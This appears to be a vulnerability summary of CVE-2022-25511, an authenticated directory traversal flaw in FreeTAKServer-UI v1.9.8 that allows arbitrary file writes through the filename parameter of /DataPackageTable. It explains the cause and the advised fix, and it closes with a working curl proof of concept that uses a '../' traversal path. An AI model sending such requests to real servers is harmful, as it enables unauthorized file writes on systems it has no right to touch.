CVE-2022-25511

An authenticated attacker sends a crafted multipart POST request to `/DataPackageTable` with a `?filename=` parameter containing `../` sequences (e.g., `../../../../../../../../tmp/file.ext`). The server does not validate or sanitize the path, so the uploaded file content is written to an arbitrary location on the filesystem [ref_id=1]. The attacker must have a valid REST API token (authentication) and network access to the FreeTAKServer-UI web interface [ref_id=1].

The route `/DataPackageTable` accepts a `?filename=` argument that is not sanitized for path or filename content [ref_id=1]. The advisory does not specify the exact source file or function name, but the issue resides in the DataPackage upload handler of FreeTAKServer-UI v1.9.8 [ref_id=1].

No patch is included in the bundle. The advisory [ref_id=1] recommends sanitizing the `?filename=` argument to restrict paths to the intended DataPackage upload directory and prevent directory traversal. Until a fix is applied, the vulnerability allows arbitrary file writes, though junk XML appended to the file makes direct code execution difficult [ref_id=1].

curl -i -s -k -X POST -H 'Host: atak.FreeTAKServer.com:19023' -H 'Authorization: Bearer ValidRestAPIToken' -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOUUxfHjKyflBjjhn' -H 'Accept-Encoding: gzip, deflate' --data-binary $'------WebKitFormBoundaryOUUxfHjKyflBjjhn\r\nContent-Disposition: form-data; name="assetfile"; filename="test.ext"\r\nContent-Type: text/plain\r\n\r\nThisIs FromDataPackageTable\r\n\r\n------WebKitFormBoundaryOUUxfHjKyflBjjhn--\r\n' 'http://atak.FreeTAKServer.com:19023/DataPackageTable?filename=../../../../../../../../tmp/file.ext&creator='